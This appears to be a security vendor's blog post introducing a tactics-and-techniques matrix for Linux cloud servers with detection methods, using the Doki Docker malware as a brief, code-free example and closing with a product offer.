Taking inspiration from the MITRE ATT&CK® framework, we previously developed a matrix categorizing adversary tactics and techniques for Linux cloud servers. Linux servers are a staple in the cloud, with some organizations having upwards of 100 to 5,000 Linux cloud servers in their production environments. If your organization has public or private servers in the cloud, they are likely Linux-based.
Use the matrix to identify gaps in your coverage against the different threats that target Linux cloud environments. As we will explain below, many of the techniques categorized on the matrix can be detected by monitoring the runtime environment for any malicious code or suspicious commands.
An Added Layer of Defense
We have added a Detection Method column to the matrix, which delineates the recommended way to detect each adversarial technique in your systems. While there are more than a few ways to detect some of these techniques, these are the most effective detection methods set forth by our experts. Please note we are only talking about host-level detection methods.
The Majority of Attacks Require Code Execution
The TTPs matrix categorizes 96 techniques spread across 10 tactics, with a common theme. Most of these techniques require the attacker to run unauthorized code or commands somewhere in the victim’s runtime environment to conduct a successful cyber attack.
Why is code execution important for an attacker?
There are nearly 100 techniques an attacker can use as part of launching a cyber attack on your Linux cloud servers. While the attack vector can vary, protecting the runtime environment is an important last line of defense since most attacks must eventually execute unauthorized code or commands. This holds true even after an attacker has stolen credentials or exploited an unknown vulnerability. If you can monitor the runtime environment for the execution of any malicious code or suspicious commands, you will be able to detect 75 percent of the techniques listed on the matrix regardless of how they got into the system.
Doki Infecting Misconfigured Docker Cloud Servers
Doki is a Linux malware infecting Docker servers in the cloud. Prior to its discovery by Intezer, the threat went undetected in VirusTotal for over 6 months. After gaining access to the system via misconfigured containers, Doki is able to execute malicious code on the host server. Let’s take a look at how Doki utilizes some of the tactics on the matrix.
- Exploits Public-facing Application: Doki takes advantage of exposed Docker API ports to gain initial access to the system.
- Command and Scripting Interpreter: Doki executes 2 different scripts, a network scanner script and a downloader script. These are commands in memory which allow the attacker to download further payloads onto the container and the host server.
- Local job scheduling: Doki modifies the host’s cron to execute the downloaded payload every minute and achieve persistence.
This resource is not affiliated with, sponsored by, or endorsed by MITRE ATT&CK®, nor does it represent the views and opinions of The MITRE Corporation or MITRE personnel.
We believe monitoring the runtime environment is the key to preventing most cyber attacks on your cloud infrastructure. Intezer Protect customers benefit from having full visibility over the code executed on their servers, while being alerted on any unauthorized or malicious code. Protect up to 10 servers for free via our community edition.